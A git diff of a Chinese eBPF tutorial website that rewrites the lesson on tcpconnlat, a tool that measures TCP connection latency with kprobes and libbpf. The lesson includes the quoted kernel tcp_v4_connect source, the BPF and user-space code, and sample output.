diff --git a/0-introduce/index.html b/0-introduce/index.html index 8cfa96d..22b9936 100644 --- a/0-introduce/index.html +++ b/0-introduce/index.html @@ -83,7 +83,7 @@ diff --git a/1-helloworld/index.html b/1-helloworld/index.html index 4c4e124..0290add 100644 --- a/1-helloworld/index.html +++ b/1-helloworld/index.html @@ -83,7 +83,7 @@ diff --git a/10-hardirqs/index.html b/10-hardirqs/index.html index 51ea540..fa60724 100644 --- a/10-hardirqs/index.html +++ b/10-hardirqs/index.html @@ -83,7 +83,7 @@ diff --git a/11-bootstrap/index.html b/11-bootstrap/index.html index a2c1f74..7fc14e9 100644 --- a/11-bootstrap/index.html +++ b/11-bootstrap/index.html @@ -83,7 +83,7 @@ diff --git a/13-tcpconnlat/index.html b/13-tcpconnlat/index.html index 8101e68..c973a72 100644 --- a/13-tcpconnlat/index.html +++ b/13-tcpconnlat/index.html @@ -83,7 +83,7 @@ @@ -144,38 +144,37 @@
-

eBPF入门实践教程:使用 libbpf-bootstrap 开发程序统计 TCP 连接延时

+

eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据

+

eBPF (Extended Berkeley Packet Filter) 是一项强大的网络和性能分析工具,被应用在 Linux 内核上。eBPF 允许开发者动态加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。

+

本文是 eBPF 入门开发实践教程的第十三篇,主要介绍如何使用 eBPF 统计 TCP 连接延时,并使用 libbpf 在用户态处理数据。

背景

-

在互联网后端日常开发接口的时候中,不管你使用的是C、Java、PHP还是Golang,都避免不了需要调用mysql、redis等组件来获取数据,可能还需要执行一些rpc远程调用,或者再调用一些其它restful api。 在这些调用的底层,基本都是在使用TCP协议进行传输。这是因为在传输层协议中,TCP协议具备可靠的连接,错误重传,拥塞控制等优点,所以目前应用比UDP更广泛一些。但相对而言,tcp 连接也有一些缺点,例如建立连接的延时较长等。因此也会出现像 QUIC ,即 快速UDP网络连接 ( Quick UDP Internet Connections )这样的替代方案。

-

tcp 连接延时分析对于网络性能分析优化或者故障排查都能起到不少作用。

-

tcpconnlat 的实现原理

-

tcpconnlat 这个工具跟踪执行活动TCP连接的内核函数(例如,通过connect()系统调用),并显示本地测量的连接的延迟(时间),即从发送 SYN 到响应包的时间。

-

tcp 连接原理

-

tcp 连接的整个过程如图所示:

-

tcpconnlate

-

在这个连接过程中,我们来简单分析一下每一步的耗时:

+

在进行后端开发时,不论使用何种编程语言,我们都常常需要调用 MySQL、Redis 等数据库,或执行一些 RPC 远程调用,或者调用其他的 RESTful API。这些调用的底层,通常都是基于 TCP 协议进行的。原因是 TCP 协议具有可靠连接、错误重传、拥塞控制等优点,因此在网络传输层协议中,TCP 的应用广泛程度超过了 UDP。然而,TCP 也有一些缺点,如建立连接的延时较长。因此,也出现了一些替代方案,例如 QUIC(Quick UDP Internet Connections,快速 UDP 网络连接)。

+

分析 TCP 连接延时对网络性能分析、优化以及故障排查都非常有用。

+

tcpconnlat 工具概述

+

tcpconnlat 这个工具能够跟踪内核中执行活动 TCP 连接的函数(如通过 connect() 系统调用),并测量并显示连接延时,即从发送 SYN 到收到响应包的时间。

+

TCP 连接原理

+

TCP 连接的建立过程,常被称为“三次握手”(Three-way Handshake)。以下是整个过程的步骤:

    -
  1. 客户端发出SYNC包:客户端一般是通过connect系统调用来发出 SYN 的,这里牵涉到本机的系统调用和软中断的 CPU 耗时开销
  2. -
  3. SYN传到服务器:SYN从客户端网卡被发出,这是一次长途远距离的网络传输
  4. -
  5. 服务器处理SYN包:内核通过软中断来收包,然后放到半连接队列中,然后再发出SYN/ACK响应。主要是 CPU 耗时开销
  6. -
  7. SYC/ACK传到客户端:长途网络跋涉
  8. -
  9. 客户端处理 SYN/ACK:客户端内核收包并处理SYN后,经过几us的CPU处理,接着发出 ACK。同样是软中断处理开销
  10. -
  11. ACK传到服务器:长途网络跋涉
  12. -
  13. 服务端收到ACK:服务器端内核收到并处理ACK,然后把对应的连接从半连接队列中取出来,然后放到全连接队列中。一次软中断CPU开销
  14. -
  15. 服务器端用户进程唤醒:正在被accpet系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。一次上下文切换的CPU开销
  16. +
  17. 客户端向服务器发送 SYN 包:客户端通过 connect() 系统调用发出 SYN。这涉及到本地的系统调用以及软中断的 CPU 时间开销。
  18. +
  19. SYN 包传送到服务器:这是一次网络传输,涉及到的时间取决于网络延迟。
  20. +
  21. 服务器处理 SYN 包:服务器内核通过软中断接收包,然后将其放入半连接队列,并发送 SYN/ACK 响应。这主要涉及 CPU 时间开销。
  22. +
  23. SYN/ACK 包传送到客户端:这是另一次网络传输。
  24. +
  25. 客户端处理 SYN/ACK:客户端内核接收并处理 SYN/ACK 包,然后发送 ACK。这主要涉及软中断处理开销。
  26. +
  27. ACK 包传送到服务器:这是第三次网络传输。
  28. +
  29. 服务器接收 ACK:服务器内核接收并处理 ACK,然后将对应的连接从半连接队列移动到全连接队列。这涉及到一次软中断的 CPU 开销。
  30. +
  31. 唤醒服务器端用户进程:被 accept() 系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。这涉及一次上下文切换的CPU开销。

在客户端视角,在正常情况下一次TCP连接总的耗时也就就大约是一次网络RTT的耗时。但在某些情况下,可能会导致连接时的网络传输耗时上涨、CPU处理开销增加、甚至是连接失败。这种时候在发现延时过长之后,就可以结合其他信息进行分析。

-

ebpf 实现原理

-

在 TCP 三次握手的时候,Linux 内核会维护两个队列,分别是:

+

tcpconnlat 的 eBPF 实现

+

为了理解 TCP 的连接建立过程,我们需要理解 Linux 内核在处理 TCP 连接时所使用的两个队列:

-

服务端收到客户端发起的 SYN 请求后,内核会把该连接存储到半连接队列,并向客户端响应 SYN+ACK,接着客户端会返回 ACK,服务端收到第三次握手的 ACK 后,内核会把连接从半连接队列移除,然后创建新的完全的连接,并将其添加到 accept 队列,等待进程调用 accept 函数时把连接取出来。

-

我们的 ebpf 代码实现在 https://github.com/yunwei37/Eunomia/blob/master/bpftools/tcpconnlat/tcpconnlat.bpf.c 中:

-

它主要使用了 trace_tcp_rcv_state_process 和 kprobe/tcp_v4_connect 这样的跟踪点:

-

-SEC("kprobe/tcp_v4_connect")
+

理解了这两个队列的用途,我们就可以开始探究 tcpconnlat 的具体实现。tcpconnlat 的实现可以分为内核态和用户态两个部分,其中包括了几个主要的跟踪点:tcp_v4_connect, tcp_v6_connecttcp_rcv_state_process

+

这些跟踪点主要位于内核中的 TCP/IP 网络栈。当执行相关的系统调用或内核函数时,这些跟踪点会被激活,从而触发 eBPF 程序的执行。这使我们能够捕获和测量 TCP 连接建立的整个过程。

+

让我们先来看一下这些挂载点的源代码:

+
SEC("kprobe/tcp_v4_connect")
 int BPF_KPROBE(tcp_v4_connect, struct sock *sk)
 {
  return trace_connect(sk);
@@ -193,76 +192,456 @@ int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk)
  return handle_tcp_rcv_state_process(ctx, sk);
 }
 
-

在 trace_connect 中,我们跟踪新的 tcp 连接,记录到达时间,并且把它加入 map 中:

-
struct {
- __uint(type, BPF_MAP_TYPE_HASH);
- __uint(max_entries, 4096);
- __type(key, struct sock *);
- __type(value, struct piddata);
+

这段代码展示了三个内核探针(kprobe)的定义。tcp_v4_connecttcp_v6_connect 在对应的 IPv4 和 IPv6 连接被初始化时被触发,调用 trace_connect() 函数,而 tcp_rcv_state_process 在内核处理 TCP 连接状态变化时被触发,调用 handle_tcp_rcv_state_process() 函数。

+

接下来的部分将分为两大块:一部分是对这些挂载点内核态部分的分析,我们将解读内核源代码来详细说明这些函数如何工作;另一部分是用户态的分析,将关注 eBPF 程序如何收集这些挂载点的数据,以及如何与用户态程序进行交互。

+

tcp_v4_connect 函数解析

+

tcp_v4_connect函数是Linux内核处理TCP的IPv4连接请求的主要方式。当用户态程序通过socket系统调用创建了一个套接字后,接着通过connect系统调用尝试连接到远程服务器,此时就会触发tcp_v4_connect函数。

+
/* This will initiate an outgoing connection. */
+int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+{
+  struct sockaddr_in *usin = (struct sockaddr_in *)uaddr;
+  struct inet_timewait_death_row *tcp_death_row;
+  struct inet_sock *inet = inet_sk(sk);
+  struct tcp_sock *tp = tcp_sk(sk);
+  struct ip_options_rcu *inet_opt;
+  struct net *net = sock_net(sk);
+  __be16 orig_sport, orig_dport;
+  __be32 daddr, nexthop;
+  struct flowi4 *fl4;
+  struct rtable *rt;
+  int err;
+
+  if (addr_len < sizeof(struct sockaddr_in))
+    return -EINVAL;
+
+  if (usin->sin_family != AF_INET)
+    return -EAFNOSUPPORT;
+
+  nexthop = daddr = usin->sin_addr.s_addr;
+  inet_opt = rcu_dereference_protected(inet->inet_opt,
+               lockdep_sock_is_held(sk));
+  if (inet_opt && inet_opt->opt.srr) {
+    if (!daddr)
+      return -EINVAL;
+    nexthop = inet_opt->opt.faddr;
+  }
+
+  orig_sport = inet->inet_sport;
+  orig_dport = usin->sin_port;
+  fl4 = &inet->cork.fl.u.ip4;
+  rt = ip_route_connect(fl4, nexthop, inet->inet_saddr,
+            sk->sk_bound_dev_if, IPPROTO_TCP, orig_sport,
+            orig_dport, sk);
+  if (IS_ERR(rt)) {
+    err = PTR_ERR(rt);
+    if (err == -ENETUNREACH)
+      IP_INC_STATS(net, IPSTATS_MIB_OUTNOROUTES);
+    return err;
+  }
+
+  if (rt->rt_flags & (RTCF_MULTICAST | RTCF_BROADCAST)) {
+    ip_rt_put(rt);
+    return -ENETUNREACH;
+  }
+
+  if (!inet_opt || !inet_opt->opt.srr)
+    daddr = fl4->daddr;
+
+  tcp_death_row = &sock_net(sk)->ipv4.tcp_death_row;
+
+  if (!inet->inet_saddr) {
+    err = inet_bhash2_update_saddr(sk,  &fl4->saddr, AF_INET);
+    if (err) {
+      ip_rt_put(rt);
+      return err;
+    }
+  } else {
+    sk_rcv_saddr_set(sk, inet->inet_saddr);
+  }
+
+  if (tp->rx_opt.ts_recent_stamp && inet->inet_daddr != daddr) {
+    /* Reset inherited state */
+    tp->rx_opt.ts_recent    = 0;
+    tp->rx_opt.ts_recent_stamp = 0;
+    if (likely(!tp->repair))
+      WRITE_ONCE(tp->write_seq, 0);
+  }
+
+  inet->inet_dport = usin->sin_port;
+  sk_daddr_set(sk, daddr);
+
+  inet_csk(sk)->icsk_ext_hdr_len = 0;
+  if (inet_opt)
+    inet_csk(sk)->icsk_ext_hdr_len = inet_opt->opt.optlen;
+
+  tp->rx_opt.mss_clamp = TCP_MSS_DEFAULT;
+
+  /* Socket identity is still unknown (sport may be zero).
+   * However we set state to SYN-SENT and not releasing socket
+   * lock select source port, enter ourselves into the hash tables and
+   * complete initialization after this.
+   */
+  tcp_set_state(sk, TCP_SYN_SENT);
+  err = inet_hash_connect(tcp_death_row, sk);
+  if (err)
+    goto failure;
+
+  sk_set_txhash(sk);
+
+  rt = ip_route_newports(fl4, rt, orig_sport, orig_dport,
+             inet->inet_sport, inet->inet_dport, sk);
+  if (IS_ERR(rt)) {
+    err = PTR_ERR(rt);
+    rt = NULL;
+    goto failure;
+  }
+  /* OK, now commit destination to socket.  */
+  sk->sk_gso_type = SKB_GSO_TCPV4;
+  sk_setup_caps(sk, &rt->dst);
+  rt = NULL;
+
+  if (likely(!tp->repair)) {
+    if (!tp->write_seq)
+      WRITE_ONCE(tp->write_seq,
+           secure_tcp_seq(inet->inet_saddr,
+              inet->inet_daddr,
+              inet->inet_sport,
+              usin->sin_port));
+    tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr,
+             inet->inet_daddr);
+  }
+
+  inet->inet_id = get_random_u16();
+
+  if (tcp_fastopen_defer_connect(sk, &err))
+    return err;
+  if (err)
+    goto failure;
+
+  err = tcp_connect(sk);
+
+  if (err)
+    goto failure;
+
+  return 0;
+
+failure:
+  /*
+   * This unhashes the socket and releases the local port,
+   * if necessary.
+   */
+  tcp_set_state(sk, TCP_CLOSE);
+  inet_bhash2_reset_saddr(sk);
+  ip_rt_put(rt);
+  sk->sk_route_caps = 0;
+  inet->inet_dport = 0;
+  return err;
+}
+EXPORT_SYMBOL(tcp_v4_connect);
+
+

参考链接:https://elixir.bootlin.com/linux/latest/source/net/ipv4/tcp_ipv4.c#L340

+

接下来,我们一步步分析这个函数:

+

首先,这个函数接收三个参数:一个套接字指针sk,一个指向套接字地址结构的指针uaddr和地址的长度addr_len

+
int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+
+

函数一开始就进行了参数检查,确认地址长度正确,而且地址的协议族必须是IPv4。不满足这些条件会导致函数返回错误。

+

接下来,函数获取目标地址,如果设置了源路由选项(这是一个高级的IP特性,通常不会被使用),那么它还会获取源路由的下一跳地址。

+
nexthop = daddr = usin->sin_addr.s_addr;
+inet_opt = rcu_dereference_protected(inet->inet_opt,
+             lockdep_sock_is_held(sk));
+if (inet_opt && inet_opt->opt.srr) {
+  if (!daddr)
+    return -EINVAL;
+  nexthop = inet_opt->opt.faddr;
+}
+
+

然后,使用这些信息来寻找一个路由到目标地址的路由项。如果不能找到路由项或者路由项指向一个多播或广播地址,函数返回错误。

+

接下来,它更新了源地址,处理了一些TCP时间戳选项的状态,并设置了目标端口和地址。之后,它更新了一些其他的套接字和TCP选项,并设置了连接状态为SYN-SENT

+

然后,这个函数使用inet_hash_connect函数尝试将套接字添加到已连接的套接字的散列表中。如果这步失败,它会恢复套接字的状态并返回错误。

+

如果前面的步骤都成功了,接着,使用新的源和目标端口来更新路由项。如果这步失败,它会清理资源并返回错误。

+

接下来,它提交目标信息到套接字,并为之后的分段偏移选择一个安全的随机值。

+

然后,函数尝试使用TCP Fast Open(TFO)进行连接,如果不能使用TFO或者TFO尝试失败,它会使用普通的TCP三次握手进行连接。

+

最后,如果上面的步骤都成功了,函数返回成功,否则,它会清理所有资源并返回错误。

+

总的来说,tcp_v4_connect函数是一个处理TCP连接请求的复杂函数,它处理了很多情况,包括参数检查、路由查找、源地址选择、源路由、TCP选项处理、TCP Fast Open,等等。它的主要目标是尽可能安全和有效地建立TCP连接。

+

内核态代码

+
// SPDX-License-Identifier: GPL-2.0
+// Copyright (c) 2020 Wenbo Zhang
+#include <vmlinux.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_core_read.h>
+#include <bpf/bpf_tracing.h>
+#include "tcpconnlat.h"
+
+#define AF_INET    2
+#define AF_INET6   10
+
+const volatile __u64 targ_min_us = 0;
+const volatile pid_t targ_tgid = 0;
+
+struct piddata {
+  char comm[TASK_COMM_LEN];
+  u64 ts;
+  u32 tgid;
+};
+
+struct {
+  __uint(type, BPF_MAP_TYPE_HASH);
+  __uint(max_entries, 4096);
+  __type(key, struct sock *);
+  __type(value, struct piddata);
 } start SEC(".maps");
 
+struct {
+  __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
+  __uint(key_size, sizeof(u32));
+  __uint(value_size, sizeof(u32));
+} events SEC(".maps");
+
 static int trace_connect(struct sock *sk)
 {
- u32 tgid = bpf_get_current_pid_tgid() >> 32;
- struct piddata piddata = {};
+  u32 tgid = bpf_get_current_pid_tgid() >> 32;
+  struct piddata piddata = {};
 
- if (targ_tgid && targ_tgid != tgid)
+  if (targ_tgid && targ_tgid != tgid)
+    return 0;
+
+  bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
+  piddata.ts = bpf_ktime_get_ns();
+  piddata.tgid = tgid;
+  bpf_map_update_elem(&start, &sk, &piddata, 0);
   return 0;
-
- bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
- piddata.ts = bpf_ktime_get_ns();
- piddata.tgid = tgid;
- bpf_map_update_elem(&start, &sk, &piddata, 0);
- return 0;
 }
-
-

在 handle_tcp_rcv_state_process 中,我们跟踪接收到的 tcp 数据包,从 map 从提取出对应的 connect 事件,并且计算延迟:

-
static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
+
+static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
 {
- struct piddata *piddatap;
- struct event event = {};
- s64 delta;
- u64 ts;
+  struct piddata *piddatap;
+  struct event event = {};
+  s64 delta;
+  u64 ts;
 
- if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
-  return 0;
+  if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
+    return 0;
 
- piddatap = bpf_map_lookup_elem(&start, &sk);
- if (!piddatap)
-  return 0;
+  piddatap = bpf_map_lookup_elem(&start, &sk);
+  if (!piddatap)
+    return 0;
 
- ts = bpf_ktime_get_ns();
- delta = (s64)(ts - piddatap->ts);
- if (delta < 0)
-  goto cleanup;
+  ts = bpf_ktime_get_ns();
+  delta = (s64)(ts - piddatap->ts);
+  if (delta < 0)
+    goto cleanup;
 
- event.delta_us = delta / 1000U;
- if (targ_min_us && event.delta_us < targ_min_us)
-  goto cleanup;
- __builtin_memcpy(&event.comm, piddatap->comm,
-   sizeof(event.comm));
- event.ts_us = ts / 1000;
- event.tgid = piddatap->tgid;
- event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
- event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
- event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
- if (event.af == AF_INET) {
-  event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
-  event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
- } else {
-  BPF_CORE_READ_INTO(&event.saddr_v6, sk,
-    __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
-  BPF_CORE_READ_INTO(&event.daddr_v6, sk,
-    __sk_common.skc_v6_daddr.in6_u.u6_addr32);
- }
- bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
-   &event, sizeof(event));
+  event.delta_us = delta / 1000U;
+  if (targ_min_us && event.delta_us < targ_min_us)
+    goto cleanup;
+  __builtin_memcpy(&event.comm, piddatap->comm,
+      sizeof(event.comm));
+  event.ts_us = ts / 1000;
+  event.tgid = piddatap->tgid;
+  event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
+  event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
+  event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
+  if (event.af == AF_INET) {
+    event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
+    event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
+  } else {
+    BPF_CORE_READ_INTO(&event.saddr_v6, sk,
+        __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
+    BPF_CORE_READ_INTO(&event.daddr_v6, sk,
+        __sk_common.skc_v6_daddr.in6_u.u6_addr32);
+  }
+  bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
+      &event, sizeof(event));
 
 cleanup:
- bpf_map_delete_elem(&start, &sk);
- return 0;
+  bpf_map_delete_elem(&start, &sk);
+  return 0;
+}
+
+SEC("kprobe/tcp_v4_connect")
+int BPF_KPROBE(tcp_v4_connect, struct sock *sk)
+{
+  return trace_connect(sk);
+}
+
+SEC("kprobe/tcp_v6_connect")
+int BPF_KPROBE(tcp_v6_connect, struct sock *sk)
+{
+  return trace_connect(sk);
+}
+
+SEC("kprobe/tcp_rcv_state_process")
+int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk)
+{
+  return handle_tcp_rcv_state_process(ctx, sk);
+}
+
+SEC("fentry/tcp_v4_connect")
+int BPF_PROG(fentry_tcp_v4_connect, struct sock *sk)
+{
+  return trace_connect(sk);
+}
+
+SEC("fentry/tcp_v6_connect")
+int BPF_PROG(fentry_tcp_v6_connect, struct sock *sk)
+{
+  return trace_connect(sk);
+}
+
+SEC("fentry/tcp_rcv_state_process")
+int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk)
+{
+  return handle_tcp_rcv_state_process(ctx, sk);
+}
+
+char LICENSE[] SEC("license") = "GPL";
+
+

这个eBPF(Extended Berkeley Packet Filter)程序主要用来监控并收集TCP连接的建立时间,即从发起TCP连接请求(connect系统调用)到连接建立完成(SYN-ACK握手过程完成)的时间间隔。这对于监测网络延迟、服务性能分析等方面非常有用。

+

首先,定义了两个eBPF maps:starteventsstart是一个哈希表,用于存储发起连接请求的进程信息和时间戳,而events是一个PERF_EVENT_ARRAY类型的map,用于将事件数据传输到用户态。

+
struct {
+  __uint(type, BPF_MAP_TYPE_HASH);
+  __uint(max_entries, 4096);
+  __type(key, struct sock *);
+  __type(value, struct piddata);
+} start SEC(".maps");
+
+struct {
+  __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
+  __uint(key_size, sizeof(u32));
+  __uint(value_size, sizeof(u32));
+} events SEC(".maps");
+
+

tcp_v4_connecttcp_v6_connect的kprobe处理函数trace_connect中,会记录下发起连接请求的进程信息(进程名、进程ID和当前时间戳),并以socket结构作为key,存储到start这个map中。

+
static int trace_connect(struct sock *sk)
+{
+  u32 tgid = bpf_get_current_pid_tgid() >> 32;
+  struct piddata piddata = {};
+
+  if (targ_tgid && targ_tgid != tgid)
+    return 0;
+
+  bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
+  piddata.ts = bpf_ktime_get_ns();
+  piddata.tgid = tgid;
+  bpf_map_update_elem(&start, &sk, &piddata, 0);
+  return 0;
 }
 
+

当TCP状态机处理到SYN-ACK包,即连接建立的时候,会触发tcp_rcv_state_process的kprobe处理函数handle_tcp_rcv_state_process。在这个函数中,首先检查socket的状态是否为SYN-SENT,如果是,会从start这个map中查找socket对应的进程信息。然后计算出从发起连接到现在的时间间隔,将该时间间隔,进程信息,以及TCP连接的详细信息(源端口,目标端口,源IP,目标IP等)作为event,通过bpf_perf_event_output函数发送到用户态。

+
static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
+{
+  struct piddata *piddatap;
+  struct event event = {};
+  s64 delta;
+  u64 ts;
+
+  if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
+    return 0;
+
+  piddatap = bpf_map_lookup_elem(&start, &sk);
+  if (!piddatap)
+    return 0;
+
+  ts = bpf_ktime_get_ns();
+  delta = (s64)(ts - piddatap->ts);
+  if (delta < 0)
+    goto cleanup;
+
+  event.delta_us = delta / 1000U;
+  if (targ_min_us && event.delta_us < targ_min_us)
+    goto
+
+ cleanup;
+  __builtin_memcpy(&event.comm, piddatap->comm,
+      sizeof(event.comm));
+  event.ts_us = ts / 1000;
+  event.tgid = piddatap->tgid;
+  event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
+  event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
+  event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
+  if (event.af == AF_INET) {
+    event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
+    event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
+  } else {
+    BPF_CORE_READ_INTO(&event.saddr_v6, sk,
+        __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
+    BPF_CORE_READ_INTO(&event.daddr_v6, sk,
+        __sk_common.skc_v6_daddr.in6_u.u6_addr32);
+  }
+  bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
+      &event, sizeof(event));
+
+cleanup:
+  bpf_map_delete_elem(&start, &sk);
+  return 0;
+}
+
+

理解这个程序的关键在于理解Linux内核的网络栈处理流程,以及eBPF程序的运行模式。Linux内核网络栈对TCP连接建立的处理过程是,首先调用tcp_v4_connecttcp_v6_connect函数(根据IP版本不同)发起TCP连接,然后在收到SYN-ACK包时,通过tcp_rcv_state_process函数来处理。eBPF程序通过在这两个关键函数上设置kprobe,可以在关键时刻得到通知并执行相应的处理代码。

+

一些关键概念说明:

+
    +
  • kprobe:Kernel Probe,是Linux内核中用于动态追踪内核行为的机制。可以在内核函数的入口和退出处设置断点,当断点被触发时,会执行与kprobe关联的eBPF程序。
  • +
  • map:是eBPF程序中的一种数据结构,用于在内核态和用户态之间共享数据。
  • +
  • socket:在Linux网络编程中,socket是一个抽象概念,表示一个网络连接的端点。内核中的struct sock结构就是对socket的实现。
  • +
+

用户态数据处理

+

用户态数据处理是使用perf_buffer__poll来接收并处理从内核发送到用户态的eBPF事件。perf_buffer__poll是libbpf库提供的一个便捷函数,用于轮询perf event buffer并处理接收到的数据。

+

首先,让我们详细看一下主轮询循环:

+
    /* main: poll */
+    while (!exiting) {
+        err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS);
+        if (err < 0 && err != -EINTR) {
+            fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err));
+            goto cleanup;
+        }
+        /* reset err to return 0 if exiting */
+        err = 0;
+    }
+
+

这段代码使用一个while循环来反复轮询perf event buffer。如果轮询出错(例如由于信号中断),会打印出错误消息。这个轮询过程会一直持续,直到收到一个退出标志exiting

+

接下来,让我们来看看handle_event函数,这个函数将处理从内核发送到用户态的每一个eBPF事件:

+
void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) {
+    const struct event* e = data;
+    char src[INET6_ADDRSTRLEN];
+    char dst[INET6_ADDRSTRLEN];
+    union {
+        struct in_addr x4;
+        struct in6_addr x6;
+    } s, d;
+    static __u64 start_ts;
+
+    if (env.timestamp) {
+        if (start_ts == 0)
+            start_ts = e->ts_us;
+        printf("%-9.3f ", (e->ts_us - start_ts) / 1000000.0);
+    }
+    if (e->af == AF_INET) {
+        s.x4.s_addr = e->saddr_v4;
+        d.x4.s_addr = e->daddr_v4;
+    } else if (e->af == AF_INET6) {
+        memcpy(&s.x6.s6_addr, e->saddr_v6, sizeof(s.x6.s6_addr));
+        memcpy(&d.x6.s6_addr, e->daddr_v6, sizeof(d.x6.s6_addr));
+    } else {
+        fprintf(stderr, "broken event: event->af=%d", e->af);
+        return;
+    }
+
+    if (env.lport) {
+        printf("%-6d %-12.12s %-2d %-16s %-6d %-16s %-5d %.2f\n", e->tgid,
+               e->comm, e->af == AF_INET ? 4 : 6,
+               inet_ntop(e->af, &s, src, sizeof(src)), e->lport,
+               inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport),
+               e->delta_us / 1000.0);
+    } else {
+        printf("%-6d %-12.12s %-2d %-16s %-16s %-5d %.2f\n", e->tgid, e->comm,
+               e->af == AF_INET ? 4 : 6, inet_ntop(e->af, &s, src, sizeof(src)),
+               inet_ntop(e->af, &d, dst, sizeof(dst)), ntohs(e->dport),
+               e->delta_us / 1000.0);
+    }
+}
+
+

handle_event函数的参数包括了CPU编号、指向数据的指针以及数据的大小。数据是一个event结构体,包含了之前在内核态计算得到的TCP连接的信息。

+

首先,它将接收到的事件的时间戳和起始时间戳(如果存在)进行对比,计算出事件的相对时间,并打印出来。接着,根据IP地址的类型(IPv4或IPv6),将源地址和目标地址从网络字节序转换为主机字节序。

+

最后,根据用户是否选择了显示本地端口,将进程ID、进程名称、IP版本、源IP地址、本地端口(如果有)、目标IP地址、目标端口以及连接建立时间打印出来。这个连接建立时间是我们在内核态eBPF程序中计算并发送到用户态的。

编译运行

$ make
 ...
@@ -277,9 +656,17 @@ PID    COMM         IP SADDR            DADDR            DPORT LAT(ms)
 222726 ssh          4  192.168.88.15    167.179.101.42   22    241.17
 222774 ssh          4  192.168.88.15    1.15.149.151     22    25.31
 
+

源代码:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/13-tcpconnlat

+

参考资料:

+

总结

-

通过上面的实验,我们可以看到,tcpconnlat 工具的实现原理是基于内核的TCP连接的跟踪,并且可以跟踪到 tcp 连接的延迟时间;除了命令行使用方式之外,还可以将其和容器、k8s 等元信息综合起来,通过 prometheusgrafana 等工具进行网络性能分析。

-

来源:https://github.com/iovisor/bcc/blob/master/libbpf-tools/tcpconnlat.bpf.c

+

通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 来跟踪和统计 TCP 连接建立的延时。我们首先深入探讨了 eBPF 程序如何在内核态监听特定的内核函数,然后通过捕获这些函数的调用,从而得到连接建立的起始时间和结束时间,计算出延时。

+

我们还进一步了解了如何使用 BPF maps 来在内核态存储和查询数据,从而在 eBPF 程序的多个部分之间共享数据。同时,我们也探讨了如何使用 perf events 来将数据从内核态发送到用户态,以便进一步处理和展示。

+

在用户态,我们介绍了如何使用 libbpf 库的 API,例如 perf_buffer__poll,来接收和处理内核态发送过来的数据。我们还讲解了如何对这些数据进行解析和打印,使得它们能以人类可读的形式显示出来。

+

如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf 。您还可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

+

接下来的教程将进一步探讨 eBPF 的高级特性,例如如何使用 eBPF 来追踪网络包的传输路径,如何利用 eBPF 对系统的性能进行细粒度的监控等等。我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术,希望这些内容对您在 eBPF 开发道路上的学习和实践有所帮助。

